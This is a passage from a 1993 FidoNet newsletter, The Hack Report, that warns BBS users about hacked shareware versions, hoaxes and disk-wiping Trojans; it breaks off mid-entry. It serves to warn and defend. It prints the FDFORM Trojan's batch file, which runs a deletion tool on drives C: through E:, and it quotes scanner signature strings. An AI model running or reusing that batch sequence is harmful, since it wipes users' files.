home *** CD-ROM | disk | FTP | other *** search
/ Media Share 9 / MEDIASHARE_09.ISO / mag&info / hack9305.zip / HACK9305.RPT < prev    next >
Text File  |  1993-05-09  |  92KB  |  1,860 lines

  1.   =========================================================================
  2.                                     ||
  3.   From the files of The Hack Squad: ||  by Lee Jackson, Moderator, FidoNet
  4.                                     ||    Int'l Echos SHAREWRE & WARNINGS
  5.           The Hack Report           ||  Volume 2, Number 5
  6.            for May, 1993            ||  Report Date: May 9, 1993
  7.                                     ||
  8.   =========================================================================
  9.  
  10.   Welcome to the fifth 1993 issue of The Hack Report.  This is a series of
  11.   reports that aim to help all users of files found on BBSs avoid
  12.   fraudulent programs, and is presented as a free public service by the
  13. | FidoNet International Shareware and Warnings Echos and the author of the
  14. | report, Lee Jackson (FidoNet 1:124/4007).
  15.  
  16.   This month was quite crazy here at Hack Central Station, due to a new job
  17.   that required relocation.  The FidoNet address shown above, 1:124/4007,
  18.   was just assigned and isn't official yet, so keep using the old address
  19.   (1:382/95) for NetMail until you see the new address in the NodeList.  As
  20.   far as this month's report is concerned, read with care:  many extremely
  21.   dangerous files have appeared, including another Trojan claiming to be a
  22.   McAfee product, and a Trojan game that rips up your hard drive with
  23.   blazing speed.  Thanks to everyone who has helped put this report
  24.   together, and to those that have sent in comments and suggestions.
  25.  
  26.   NOTE TO SYSOPS: The Hack Report may be freely posted as a bulletin on
  27.   your BBS, subject to these conditions:
  28.  
  29.              1) the latest version is used,
  30.              2) it is posted in its entirety, and
  31.              3) it is not altered in any way.
  32.  
  33. | NOTE TO OTHER READERS: The Hack Report (file version) may be freely
  34. | uploaded to any BBS, subject to the above conditions, and only if you do
  35. | not change the filename.  You may convert the archive type as you wish,
  36. | but please leave the filename in its original HACK????.* format.  The
  37. | Hack Report may also be cross-posted in other networks (with the
  38. | permission of the other network) as long as it meets the above conditions
  39. | and you give appropriate credit to the FidoNet International Shareware
  40. | and Warnings Echos (and the author <g>).
  41.  
  42.   The idea is to make this information available freely.  However, please
  43.   don't cut out the disclaimers and other information if you use it, or
  44.   confuse the issue by spreading the file under different names.  Thanks!
  45.  
  46.   DISCLAIMER: The listings of Official Versions are not a guarantee of the
  47.   files' safety or fitness for use  Someone out there might just be
  48.   sick-minded enough to upload a Trojan with an "official" file name, so
  49.   >scan everything you download<!!!  The author of this report will not be
  50.   responsible for any damage to any system caused by the programs listed as
  51.   Official Versions, or by anything using the name of an Official Version.
  52.  
  53. | On this same note, programs and files listed in this report should not be
  54. | automatically considered dangerous.  It is simply impossible for the
  55. | author of this report to receive and test copies of every listed file, so
  56. | many of the reports listed herein are based on information sent to the
  57. | author by individuals in the BBS community.  For this reason, neither the
  58. | author of this report nor anyone officially associated with it shall be
  59. | held liable for any losses and/or damages resulting from a listing in
  60. | this report.
  61.  
  62.   Finally, the releases listed as the latest Official Versions may not be
  63.   entirely accurate.  However, they do reflect the latest version known to
  64.   the author of The Hack Report at the time of writing.  That's the nature
  65.   of the beast we call shareware:  authors have every right (and in this
  66.   writer's opinion, are well advised) to release a new version without
  67.   advance notice of any kind.  If you see a version newer than one listed
  68.   here, please contact one of The HackWatchers or myself so that we can
  69.   keep these listings up to date.
  70.  
  71.   *************************************************************************
  72.  
  73.                               Hacked Programs
  74.  
  75.   Here are the latest known versions of some programs known to have hacked
  76.   copies floating around.  Archive names are listed when known, along with
  77.   the person who reported the fraud (thanks from us all!).
  78.  
  79.    Program              Hack(s)                    Latest Official Version
  80.    =======              =======                    =======================
  81. |  ARJ Archiver         ARJ250                     ARJ239F
  82.       Reported By:  Tommy Vielkanowitz(1:151/2305)
  83.                         ARJ239E
  84.       Reported By:  The Hack Squad
  85.                         ARJ240A
  86.       Reported By:  Ryan Shaw (1:152/38)
  87.  
  88.    BNU FOSSIL Driver    BNU202                     BNU170
  89.       Reported By: Amauty Lambrecht (2:291/712)    (not counting betas)
  90.                         BNU188B
  91.       Reported By: David Nugent (3:632/348),
  92.                       Author of BNU
  93.  
  94.    DMS Amiga Disk       DMS version 1.12           DMS version 1.11
  95.     Masher
  96.       Reported By: Ben Filips, via Jay Ruyle (1:377/31)
  97.  
  98. |  F-Prot Virus Scanner FP-205B                    FP-208
  99.       Reported By: HW Bill Lambdin
  100.  
  101.    LhA Amiga Archiver   LHA148E                    LHA138E (Shareware)
  102.       Reported By: Michael Arends (1:343/54)       LHA v1.50r (Regist.)
  103.                         LHA151
  104.       Reported By: Lawrence Chen (1:134/3002)
  105.  
  106.    LHA Archiver (PC)    LHA214                     LHA213 (non-beta)*
  107.       Reported by: Patrick Lee (RIME address RUNNINGB)
  108. |                       LHA214B
  109. |                       ICE214
  110. |                       LHA215
  111. |     Reported by: Kenjirou Okubo, LHA Support Rep.
  112. |        (Internet address: kenjirou@mathdent.im.uec.ac.jp)
  113.                         LHA300
  114.       Reported by: Mark Church (1:260/284)
  115.  
  116.    MusicPlay            MPLAY31                    MPLAY25B
  117.       Reported By: Lee Madajczyk (1:280/5)
  118.  
  119.    PKLite               PKLTE201                   PKL115
  120.       Reported By: Wen-Chung Wu (1:102/342)
  121.  
  122.    PKZip                PKZ301                     PKZ204G
  123.       Reported By: Mark Dudley (1:3612/601)
  124.                    Jon Grimes (1:104/332)
  125.  
  126.  
  127.    Shez                 SHEZ72A                    SHEZ89
  128.                         SHEZ73
  129.       Reported By: HW Bill Lambdin
  130.  
  131.    Telemate             TM40C                      TM400-1 through 4
  132.       Reported By: Philip Dynes, RIME Telemate
  133.                    conference, via HW Richard
  134.                    Steiner
  135.                         TM410-1
  136.       Reported By: Bat Lang (1:382/91)
  137.  
  138.    Telix                Telix v3.20                TLX321-1
  139.                          (Prior to Dec. 1992)      TLX321-2
  140.                         Telix v3.25                TLX321-3
  141.       Reported By: Brian C. Blad (1:114/107)       TLX321-4
  142.                    Peter Kirn (WildNet, via HW Ken Whiton)
  143.                         Telix v4.00
  144.                         Telix v4.15
  145.       Reported By: Barry Bryan (1:370/70)
  146.                         Telix v4.25
  147.       Reported By: Daniel Zuck (2:247/30, via Chris
  148.                     Lueders (2:241/5306.1)
  149.                         MegaTelix
  150.       Verified By: Jeff Woods, deltaComm, Inc.
  151.                         Telix Pro
  152.       Reported By: Jason Engebretson (1:114/36),
  153.                    in the FidoNet TELIX echo
  154.  
  155.    TheDraw              TDRAW430                   TDRAW461
  156. |                       TDRAW5
  157.       Reported by: Ian Douglas (5:7102/119)
  158.                         TDRAW500
  159.       Reported by: Ian Davis, Author
  160.                         TDRAW550
  161.       Reported by: Steve Klemetti (1:228/19)
  162.                         TDRAW600
  163.       Reported by: Hawley Warren (1:120/297)
  164.                         THEDR60
  165.       Reported by: Larry Owens (PDREVIEW echo, 1:280/17)
  166.                         TDRAW601
  167.       Reported by: Jesper Tragardh (2:200/109)
  168.                         TDRAW800
  169.       Reported by: James Carswell (1:153/775)
  170.  
  171.  
  172.    Wolfenstein-3D       WOLF2-1                    #1WOLF14
  173.                         WOLF2-2
  174.       Reported By: Wen-Chung Wu (1:102/342)
  175.  
  176.  
  177. | * -   See the section "Clarifications and Thanks" for details on
  178. |       other valid version numbers for LHA.
  179.  
  180.   =========================================================================
  181.  
  182.                                 Hoax Alert:
  183.  
  184. | The Hack That Wouldn't Die has reared its ugly head again:  XTRATANK is
  185. | still floating around out there, according to a sighting by Mike Ledoux
  186. | (1:132/202).  This file was reported in detail in the 1992 Full Archive
  187. | Edition of The Hack Report (HACK92FA), but it seems to be so unwilling to
  188. | go away that it is mentioned again here.  For those of you new to The
  189. | Hack Report, XTRATANK is a confirmed and tested hoax that does _not_
  190. | double your hard drive space, regardless of what you might see when you
  191. | do a DIR command.  If you have doubts, try the Fitzgerald test below.
  192. |
  193. | *** The Fitzgerald Test
  194. |
  195. | Here is the now-famous Fitzgerald Test, devised by Tim Fitzgerald of
  196. | 1:3800/18.0 and validated through testing performed by Bill Logan of The
  197. | Pueblo Group (1:300/22).  Try this if you think you have managed to get
  198. | XTRATANK to work on your system.  Follow these simple steps:
  199. |
  200. |     1. Run CHKDSK and write down the free space it reports as free.
  201. |     2. Do a DIR command and write down what XTRATANK reports.
  202. |     3. Copy any text file to a new text file.
  203. |     4. Repeat steps 1 and 2, and compare.
  204. |
  205. | You will see that XTRATANK reports that twice as much disk space is taken
  206. | up by the new text file.
  207.  
  208.  
  209. | Michael Toth (1:115/439.7) has located another incident of the Amiga
  210. | Emulator hoax, reported in the 1992 Full Archive Edition of The Hack
  211. | Report as AMIGA.  This time, the file was under the filename IBM_AMGA,
  212. | and contained the following internal files:
  213. |
  214. | Name          Length    Method    Size now  Mod Date    Time     CRC
  215. | ============  ========  ========  ========  =========  ======== ========
  216. | README.USA         393  Imploded       338  10 Apr 91  18:07:06 2CF72B62
  217. | EMULATOR.EXE    273947  Imploded    157084  15 Sep 90  01:00:00 02A68881
  218. | ============  ========  ========  ========  =========  ======== ========
  219. | *total     2    274340  ZIP 1.10    158592  13 Oct 91  11:28:00
  220. |
  221. | The file claims to emulate Kickstart 1.2, version 33.192, on an IBM
  222. | compatible.  Michael's tests show that this file doesn't do much, if
  223. | anything - 15 minutes worth of waiting after running the program produced
  224. | no results.
  225.  
  226.  
  227.   Recently, an archive of Frisk's (a.k.a. Fridrik Skulason's) F-Prot Virus
  228.   Scanner v2.07 has been distributed with a "registration form" from a
  229.   company called JLT.  According to Frisk, this is not legitimate.  He says
  230.   that JLT contacted him in the fall of 1992, asking if they could
  231.   distribute F-Prot, collect registration fees, and forward 50% of the fees
  232.   to him.  Frisk didn't want them to do this, but it appears that an
  233.   archive with the "registration form" may have slipped into distribution.
  234.   In Frisk's words, "...this version is most certainly not something that I
  235.   want distributed."
  236.  
  237.  
  238.   From the "Not Really A Program, but Interesting Anyway" department, a
  239.   "press release" has entered distribution, claiming that PKWare Inc. has
  240.   filed for Chapter 11 bankruptcy.  The letter is dated Friday, February
  241.   26, 1993, and supposedly quotes Mark Gresbach of PKWare in the statement.
  242.  
  243.   However, in a message posted in the CompuServe PKWARE forum on March 1,
  244.   1993, PKWare employee Douglas Hay states that this is not true.  Douglas
  245.   also points out that the perpetrator of the hoax misspelled the word
  246.   Milwaukee (as 'Milwaukie'), and that one of the three phone numbers in
  247.   the message for PKWare is wrong.  In short, ignore the letter - PKWare
  248.   has _not_ filed bankruptcy.
  249.  
  250.  
  251.   Other previously reported hoaxes:
  252.  
  253.   Filename      Claimed use/Actual activity/Reporter(s)
  254.   ============  ==========================================================
  255.   PKZ305        Hacked "new version" of PKZip.  However, a message in wide
  256.                 circulation claimed this was infected with a virus called
  257.                 PROTO-T.  This message is the actual hoax:  there may be
  258.                 one or more PROTO-T viruses around now, but none do what
  259.                 was claimed in the hoax message.  This hack, PKZ305, was
  260.                 not infected with any virus, nor did it contain Trojan
  261.                 code, per testing by Bill Logan (1:300/22), HW Jeff White,
  262.                 and HW Bill Lambdin.
  263.  
  264.   RAOPT         "Optimizes" your RemoteAccess BBS files and claims to be
  265.                 from Continental Software.  Actually does nothing but read
  266.                 your USERS.BBS file and report the number of users.  The
  267.                 program is _not_ from Continental Software, according to
  268.                 Andrew Milner.  Reported by Kai Sundren (2:201/150), via
  269.                 HW Mikael Winterkvist.
  270.  
  271.   SCORCHV2      Claims to be v2.0 of the game Scorched Earth:  this version
  272.                 doesn't yet exist.  Actually a renamed archive of version
  273.                 1.2.  Reported by Brian Dhatt (1:3648/2.5).
  274.  
  275.   =========================================================================
  276.  
  277.                               The Trojan Wars
  278.  
  279.   You know that sick feeling your stomach gets on a roller coaster, just as
  280.   you pass the top of the first hill and start plunging toward oblivion?
  281.   That's how things felt here at Hack Central Station when the results of
  282.   several file tests came in.  And kept coming in.  There are a lot of
  283.   _extremely_ nasty ones this time around, more than in most issues of this
  284.   report.  So, hold onto your hat, strap yourself in, keep your arms and
  285.   legs inside the car, and read on.
  286.  
  287.  
  288. | First, an update on the DEBUG script forwarded by Jack Cross (1:3805/13)
  289. | from the FidoNet BATPOWER echo.  The script, which has created a great
  290. | deal of discussion, created an archive (LZH) of the program TinyCache
  291. | (filename TNYCACHE), claiming to be a small disk cache.
  292. |
  293. | As soon as the script was posted, folks started reporting symptoms of
  294. | destructive activity:  destroyed FATs and reformatted hard drives were
  295. | been reported after this program was run.
  296. |
  297. | Prior to the publication of the April edition of this report, I tried a
  298. | feeble attempt at analyzing this program myself.  However, as I have said
  299. | before to folks who contact Hack Central Station, I'm a reporter, not an
  300. | AV expert.  So, I forwarded a copy of this script to HW Jeff White of The
  301. | Pueblo Group for testing.  Others ran their own tests, and still others
  302. | forwarded the resulting archive for further testing.  The reports (which
  303. | are _far_ too numerous to credit in their entirety - please accept my
  304. | thanks for your help!) had some similar results, but left some confusion
  305. | as to what this file actually is.
  306. |
  307. | All of the reports indicate that the unarchived file, TNYCACHE.COM, is
  308. | compressed with PKLite and that the PKLite ID header was edited out of
  309. | the resulting file.  Once decompressed, McAfee's SCAN reported that the
  310. | file was infected with the Taiwan3 [T3] virus, and Frisk's F-Prot
  311. | detected the AnitCAD virus.
  312. |
  313. | This is where things get wierd.  Bill Dirks (1:385/17) reported that
  314. | there were two versions of the file - TNYCACHE.EXE and TNYCACHE.COM.  He
  315. | also said that the .exe version is actually a renamed copy of the SCCHECK
  316. | Trojan, and that the .com version is "hacked to include a hacked version
  317. | of the AntiCAD virus."
  318. |
  319. | Bill included the following scanner strings for use with McAfee's SCAN:
  320. |
  321. |             "2BC00221200961642E6578652004" Pklited-Anticad
  322. |             "46048B4E068B56088B5E0CCD261B" Sccheck-Trojan
  323. |
  324. | The second string can also be used with Frisk's F-Prot as a user string,
  325. | as long as you inform the program that it is a .com/.exe infector.
  326. |
  327. | However, Bob Stettina, a user at 1:382/77, had a different analysis of
  328. | this file, based on a report he says he received from Spencer Clarke of
  329. | McAfee Associates.  Bob also decompressed the PKLited .com file and
  330. | received a Taiwan3 [T3] report from McAfee's SCAN v102.  After this, he
  331. | uploaded the file to McAfee Associates.
  332. |
  333. | The report received from Mr. Clarke said, according to Bob, that this
  334. | file is "a unique/new Trojan, and it is *NOT* actually infected with a
  335. | virus:  rather, this Trojan includes a segment of code that is
  336. | accidentally 'recognized' by SCAN as the Taiwan3 virus."  The report also
  337. | stated that other scanners gave off false alarms on this file.  Finally,
  338. | Bob goes on to say that this file does not replicate:  since the ability
  339. | to reproduce is part of the basic definition of a virus, Bob concludes
  340. | that this one fails that test and is therefore a Trojan.
  341. |
  342. | HW Jeff White's test results tended to agree with the majority of the
  343. | reports:  the .com file was simply infected with the Taiwan3 [T3] virus,
  344. | and was capable of being "cleaned" by McAfee's Clean-Up v102.
  345. |
  346. | This has been a fascinating study in program analysis.  However, I'm sure
  347. | that the folks who were hit by this are not quite as fascinated - the
  348. | word infuriated would be more appropriate.  Whatever the program actually
  349. | is, be it virus, Trojan, or whatever, it _may_ have been re-created from
  350. | the DEBUG script by someone, not run on their system, and later
  351. | absent-mindedly uploaded as an archive to a BBS.  If you see this file,
  352. | make sure it's the same one we're talking about here:  if it is, delete
  353. | first and ask questions later.
  354.  
  355.  
  356. | Andy Thomas (1:125/217) forwarded a report from Allan Thomas (Smartnet
  357. | Virus Conference) about an infected copy of the archive BBSLAWS.  The
  358. | archive contained two files - NEWLAWS.TXT and README.COM.  The .txt file
  359. | seemed to be for real, but the .com file was another story.  According to
  360. | Allan, the program displays the following message just before it locks up
  361. | your system:
  362. |
  363. |     "Install v1.0 (c) Vivid Imaginations, Ltd.  All rights reversed."
  364. |
  365. | As Allan points out, note the spelling of the last word in the above
  366. | quote:  quite subtle.  The damage you will find after you reboot is not
  367. | so subtle, though - the program at least overwrites your MBR and 1st FAT,
  368. | deletes itself, and overwrites the remnants of itself with garbage to
  369. | hide the evidence.  When it overwrites itself, it writes enough bytes to
  370. | cover every sector it used to occupy, resulting in a write of more bytes
  371. | than the original file size.
  372.  
  373.  
  374. | Paul Harney (1:107/579) forwarded a message from a user, Rod Fewster,
  375. | concerning a sighting of something claiming to be PKZip v2.04I.  The
  376. | file, a self-extracting archive called PKZ204I, shows a "valid"
  377. | authenticity verification on unpacking.  However, Rod says both the
  378. | internal files PKZIP.EXE and PKUNZIP.EXE "whack out your CMOS settings
  379. | totally as soon as they're run."  No other damage was reported.
  380. |
  381. | Here are the vital stats, as provided by Rod:
  382. |
  383. |       "Archive date is 02-22-93 20:35.
  384. |
  385. |       "All files are dated 02-22-93 02.04 except pkunzip.exe
  386. |        which is dated 02-22-93 20:34."
  387. |
  388. | Rod also provided a comparison between v2.04g and this file's
  389. | executables:
  390. |
  391. |       "v2.04g filesizes are:  pkzip.exe 42166   pkunzip.exe 29378
  392. |        v2.04i filesizes are:  pkzip.exe 42186   pkunzip.exe 29398"
  393.  
  394.  
  395. | Chuck Gustafson (1:2201/33) forwarded to the FidoNet echo DIRTY_DOZEN a
  396. | report from Brian Buchanan (Brian Buchanan #1 @8251 VirtualNET) about the
  397. | file FDFORM.  This appears to be an isolated incident of a Trojan version
  398. | of the legitimate program FDFormat.  The .zip archive was only 13106
  399. | bytes long, and contained the files FDOCS.PAK (317 bytes), FDFORMAT.PAK
  400. | (11366 bytes), and FDSETUP.BAT (174 bytes).  The .bat file contains the
  401. | following commands:
  402. |
  403. |                 @echo off
  404. |                 cls
  405. |                 echo Analizing system configuration...
  406. |                 @echo off
  407. |                 ren fdocs.pak fd.exe
  408. |                 echo Unpacking files...
  409. |                 echo (This may take a few minutes)
  410. |                 fd c:\
  411. |                 fd d:\
  412. |                 fd e:\
  413. |
  414. | The problem here is that the file FDOCS.PAK is actually a renamed copy of
  415. | a program called NHUE, which according to Brian is a utility that deletes
  416. | all files and sub-directories in the directory specified on the command
  417. | line.  If you look at what happens in the .bat file, you'll note that
  418. | NHUE, originally renamed FDOCS.PAK, is re-renamed to FD.EXE and is called
  419. | for drives C: through E:, potentially wiping out everything on these
  420. | drives.
  421.  
  422.  
  423. | Lee Noga (1:3618/23), apparently one of the folks associated with the
  424. | PowerPak Gold '92 Shareware CD-ROM disk, asked that I help warn folks of
  425. | a Trojan file on their disk called MWARS20.  This file, which has been
  426. | seen in other locations, contains two files, DEMO.EXE and READTHIS.COM,
  427. | which appear to be the main culprits.  According to a report from Scott
  428. | Catterill (Intelec PC-Security conference, via HW Bill Lambdin and based
  429. | on info from Dave Comeau), both files contain the following text:
  430. |
  431. |   eat this. REVENGE!. Melting Memory!. Maybe next time, you won't steal
  432. |   people's Passwords and get them ****** off at you... I hope you backed
  433. |   up your hard drive!
  434. |
  435. | Scott says both will try to low-level format your hard drive.  However,
  436. | according to Lee Noga's report, the program acts a bit differently.  The
  437. | copy on the PowerPak CD-ROM contains the following files:
  438. |
  439. |                      MWARS.BAT      128     07/17/92
  440. |                    MWARS20.EXE    15864     02/15/92
  441. |                    MWARS20.DOC     2058     07/17/92
  442. |                       NOTE.DOC      309     01/01/80
  443. |                        YANG.ME      121     07/17/92
  444. |                    INSTALL.EXE    39080     06/14/90
  445. |                       DEMO.EXE     5470     04/22/90
  446. |                    DOMENOW.COM      937     09/24/90
  447. |                   READTHIS.COM     5470     04/22/90
  448. |
  449. | Lee says the program does its damage via the .bat file, via DEMO.COM, and
  450. | via DOMENOW.COM - all three are dangerous, as they will scramble your
  451. | hard drive's FAT table.  The same message as Scott reports will appear,
  452. | but if you reboot during its display, you may be able to abort the
  453. | Trojan's damage.  Lee also notes that the game itself was untouched:  if
  454. | you don't invoke it via the .bat file, it will run just fine.  Bizarre.
  455. |
  456. | (Editorial - I appreciate the effort taken by vendors to inform the
  457. | public of a problem with their product.  Even if the publicity hurts
  458. | sales, the loss can't be worse than the potential loss caused by a
  459. | perception that a company doesn't care about whether or not their product
  460. | is dangerous.  This is not an indictment of _any_ company or author:  it
  461. | is merely intended to encourage companies and authors to report attacks
  462. | against and/or problems with their products as soon as they learn of
  463. | them.  My life would be _so_ much easier. <g>  -lj)
  464.  
  465.  
  466. | Tom Guelker (1:2250/26) posts in the FidoNet DIRTY_DOZEN echo a report of
  467. | a Trojan called SINBAD.  It claims to be a file transfer protocol
  468. | utility, but it actually throws your system into a perpetual loop by
  469. | overwriting your AUTOEXEC.BAT file.  The new AUTOEXEC.BAT (as well as
  470. | SINBAD.EXE) becomes read-only and invokes SINBAD.EXE, which again
  471. | overwrites AUTOEXEC.BAT with the same info (apparently turning off the
  472. | read-only bit first <?>), etc. ad nauseum.  Definitely sounds irritating,
  473. | but not dangerous unless you don't have a copy of your original
  474. | AUTOEXEC.BAT file:  you can bypass the loop by booting from a known
  475. | clean, write-protected system disk, and then use a utility such as the
  476. | MS-DOS 4.01 and above ATTRIB.EXE to remove the read-only bit.  This will
  477. | allow you to delete the offending .bat file and replace it with a copy of
  478. | your original, or to re-write it if you didn't have a backup.
  479.  
  480.  
  481. | Henry Shaw (1:261/1177, via Jack Cross, 1:3805/13) reports on TAGCRASH, a
  482. | supposed utility or crack of some sort for TAG BBS systems.  Henry says
  483. | the archive contained the internal file TAGUTIL.COM, which started off in
  484. | your \BBS directory and "worked its way through the obvious choices of
  485. | \TAG and \MULTI till it found all the .DAT files, .LST files and
  486. | everything else that pertained to a TAG board."  These files would be
  487. | deleted when found.  An easy way to trash a TAG system, Henry says.
  488.  
  489.  
  490. | HW Richard Steiner forwarded a message from the ILink Shareware_Support
  491. | conference by Bob Feldman concerning an archive named HSDIAG.  Bob stated
  492. | that this file is a Trojan.  Bob posted further details on the ILink
  493. | Virus conference (forwarded by HW Bill Lambdin), and also sent a copy of
  494. | the file to R. Wallace Hale, SysOp of the Driftnet BBS ((506)325-9002).
  495. | Mr. Hale did preliminary testing of the file, and was able to determine
  496. | that it will at least try to overwrite the first 255 sectors on the first
  497. | eight drives in a system, including floppy drives.  For the full text of
  498. | Mr. Hale's report, as forwarded by HW Bill Lambdin and James FitzGibbon
  499. | (1:250/301), please obtain the archive version of The Hack Report and see
  500. | the file HSDIAG.RES, located inside the internal archive FILETSTS.LZH.
  501.  
  502.  
  503. | HW Jeff White received a file for testing called ANSIVIEW.COM, which has
  504. | apparently been seen inside a couple of archives, most often ANSI
  505. | collections.  The copy Jeff received for testing is infected with the
  506. | AIDS [N1] virus, and cannot be disinfected by either McAfee's Clean-Up or
  507. | the AIDSOUT utility.  The infection is detectable by McAfee's SCAN.  Yet
  508. | another of The Hack Squad's 2048 reasons to check everything you download
  509. | for viruses.
  510.  
  511.  
  512. | HW Scott Raymond has cleared up a discrepancy that I had in previous
  513. | reports concerning the file BWAVE_3.  This was listed as a hack of the
  514. | Blue Wave Offline Reader, but according to the report received by Scott
  515. | from a user in Australia, the file is actually a Trojan.  The user in
  516. | Australia reported that the Trojan trashed partitions and boot sectors,
  517. | in addition to attacking RemoteAccess BBS data files.  According to
  518. | Scott, this is the same file reported by Frans Hagelaars (2:512/2).
  519. | Please note that this Trojan was discovered prior to the release of
  520. | BWAVE212, version 2.12 of the reader.
  521.  
  522.  
  523. | Vincent Aniello (aniello@gauss.rutgers.edu) reported a "back door" for
  524. | use when logging onto Renegade BBS systems.  This file, RGBACKDR, claims
  525. | to allow you to log onto any Renegade board with SysOp privileges.
  526. | Instead, it makes a beeline for several key files on _your_ system and
  527. | deletes them.  For the full text of the test results, as performed by HW
  528. | Jeff White of The Pueblo Group, see the file RGBACKDR.RES in the archive
  529. | FILETSTS.LZH, found in the archive version of The Hack Report.
  530.  
  531.  
  532. | Maynard Marquis (1:141/328) forwarded a message to the FidoNet Int'l Echo
  533. | WARNINGS from Joel Lambert about a file called TW-CHEAT.  This claims to
  534. | be a cheat file for Tradewars 2002, and contains the following files:
  535. |
  536. |                 TW-CHEAT EXE      6306 03-09-93   9:47p
  537. |                 SIN      COM       535 03-09-93   9:47p
  538. |
  539. | He did not say which file he ran, but one of these displayed "some
  540. | unrelated menu" and then returned to DOS.  Apparently, Joel later
  541. | rebooted, at which point the BOOTSAFE program (part of Central Point
  542. | Antivirus) reported that his system had been infected with the Tequila
  543. | virus.  Fortunately, he was able to remove the infection.  He hopes.  I
  544. | hope so too, for his sake.
  545.  
  546.  
  547. | Michael Heinbockel (2:242/316) found a file on a BBS in Hamburg, Germany,
  548. | called PARITY.  This file renames your AUTOEXEC.BAT file to AUTOEXEC.BAK,
  549. | creates a new AUTOEXEC.BAT file with the single line C:\DOS\PARITY.EXE,
  550. | and then tries to copy itself to your C:\DOS\ directory.  It usually
  551. | hangs the system during the copy attempt, resulting in the file not being
  552. | copied.  It may be a Trojan that doesn't work, but it is still a Trojan.
  553.  
  554.  
  555. | Several reports came in on yet another Trojan attack against McAfee's
  556. | SCAN - this time, under the filename SCANV103.  The first report came via
  557. | Eugene Woiwod (Eugen_Woiwod@mindlink.bc.ca), and full test results were
  558. | later received from Bill Logan of The Pueblo Group (via HW Jeff White).
  559. | As a result of this Trojan, McAfee Associates decided to skip version
  560. | number 103, using number 104 as the release which followed SCANV102.  For
  561. | a full text of Bill's test results, see the file SCANV103.RES in the
  562. | archive FILETSTS.LZH, found in the archive version of The Hack Report.
  563.  
  564.  
  565. | Staale Fagerland (staale.fagerland@euronetis.no) reported a file called
  566. | CES_402, which claimed to be an antiviral program.  However, the archive
  567. | contains two files (CES.COM and DONT_!) which are quite suspicious.
  568. | Staale ran the CES.COM file through a program called CHK4BOMB and
  569. | discovered that it uses ROM BIOS routines for direct disk access.  The
  570. | file DONT_! contains several messages that relate to corrupting your FAT,
  571. | partition table, etc., and the message, "Mate(s), it simply makes sense,
  572. | make a backup...".
  573.  
  574.  
  575. | Ashley Kleynhans (5:7101/55) reports a Trojan called DREAMDEM, which
  576. | claims to be a demo of some sort by a computer group.  According to
  577. | Ashley, the group named in the file descriptions is not responsible for
  578. | creating this Trojan.  When run, the file displays several messages,
  579. | including ones like, "found PC Speaker," "Found porno GIFs," etc., and
  580. | finally asks whether or not you have a sound card.  Ashley answered Yes
  581. | to this question, and received the response, "OH by the way, I trashed
  582. | your hard disk about a minute ago."
  583. |
  584. | Ashley immediately did a DIR command on the C: drive and saw no immediate
  585. | damage.  However, the entire disk was gone after a system reset.  Ashley
  586. | says this is because the Trojan deletes both your hard disk partition
  587. | table and your boot sector.  I'm not sure if this is right, but I
  588. | wouldn't want to try it out on my system to verify Ashley's findings.
  589. |
  590. | Here is the internal file info:
  591. |
  592. |                 CHECKANS COM      3585 03-10-93   2:43p
  593. |                 VGADEMO  EXE      8892 04-17-93   7:45p
  594. |                 START    BAT        17 04-17-93   1:33p
  595.  
  596.  
  597. | Brent Thomas (1:202/226) says in the FidoNet DIRTY_DOZEN echo that his
  598. | system was "taken down" by a file called DRAGON.  It claimed to be a
  599. | Public Domain VGA and Sound Blaster supported game.  No symptoms were
  600. | reported, except that he had to reformat his hard drive.
  601. |
  602. | Penny Nebrich (1:369/101) confirms this, saying that the program that was
  603. | affected was one called Dragon's Shard.  She states that it "created what
  604. | looked like infinite subdirectories with binary names of I think it was a
  605. | dir name of 8 chars. McAfee's scan and Virucide just got stuck in an
  606. | infinite loop. I had to reformat my drive."
  607. |
  608. | I'm still not familiar with any program called Dragon's Shard, so be
  609. | warned that this may be a legitimate program that has had at least one,
  610. | possibly two copies tampered with.
  611.  
  612.  
  613. | Josh Burke (1:138/174) reports, via Charlie Sheridan (1:356/18), Travis
  614. | Griggs (1:3807/8), and HW Bob Seaborn, a problem with the file PHYLOX2.
  615. | In what might be an isolated incident, Josh says the file claimed to be a
  616. | "really cool game, VGA gfx and SB sound."  However, the INSTALL program
  617. | destroys hard disks.
  618. |
  619. | Bob Seaborn received a copy of this file and forwarded it to me - I in
  620. | turn forwarded it to Bill Logan and HW Jeff White for testing.  As it
  621. | turns out, there is an internal file called SETUP.EXE that is identical,
  622. | byte for byte, with the file INSTALL.EXE.  Both will trash your hard
  623. | drive with amazing speed, according to HW Jeff White.  Also, the file
  624. | PHYLOX.EXE is flagged as a possible infected file.  For a full text of
  625. | the test results, see the file PHYLOX.RES in the internal archive
  626. | FILETSTS.LZH, found in the archive version of The Hack Report.
  627.  
  628.  
  629.   Ryan Tucker (1:290/10) forwards a message from a fellow SysOp, Robert
  630.   Pedersen, about ASM2PAS.  This claims to create Pascal source code from
  631.   an .EXE file.  However, from text inside the executable, it appears that
  632.   this program tries to delete your DOS directory.  It also brags about a
  633.   certain anti-viral scanner not being able to detect it.
  634.  
  635.   Valid point, that:  practically _no_ anti-viral tools detect Trojans,
  636.   with the exception of Frisk's F-Prot and one or two others.  Even then,
  637.   the Trojan detection is not complete.  Your best protection against
  638.   Trojans is a religiously maintained set of backups, preferably done after
  639.   a check for viruses on your hard drive(s).
  640.  
  641.  
  642.   HW Richard Steiner forwarded a message from the America OnLine GEOWORKS
  643.   forum about the file GEOCOMM.  The message, from "GW Steve" (a "GeoRep",
  644.   according to Richard), came from a user of GeoComm named J. S. James, and
  645.   warned that this archive contains a hacked version of the original
  646.   GeoComm program.  The file claims to be an "update," but it seems to be a
  647.   Trojan which will damage your File Allocation Table (FAT).  Not a file to
  648.   be kept around, it would seem.
  649.  
  650.  
  651.   HW Bill Lambdin reports on LAW22 (no description), which contains the
  652.   following files:
  653.  
  654.        Length    Date    Time    CRC-32  Attr  Name
  655.        ------    ----    ----   -------- ----  ----
  656.         22911  02-24-93  14:13  a4b84cc7 --w-  ABOUT.COM
  657.         13422  02-24-93  14:44  8f0d1e96 --w-  INFO.EXE
  658.           126  02-24-93  14:50  68c9463a --w-  DESC.SDI
  659.        ------                                  -------
  660.         36459                                        3
  661.  
  662.   Bill says that ABOUT.COM contains a virus. Scan 102 labels it as BA101,
  663.   which is a 160 byte-long .COM file infector.  This could be an isolated
  664.   incident of an infected legitimate file, so thoroughly check any such
  665.   file you find that has the above files in it before you kill it.
  666.  
  667.  
  668.   Another report from Mr. Lambdin concerns a file that a user in the
  669.   Intelec PC-Security conference sent to him, called PCS204 (PC-Sentry
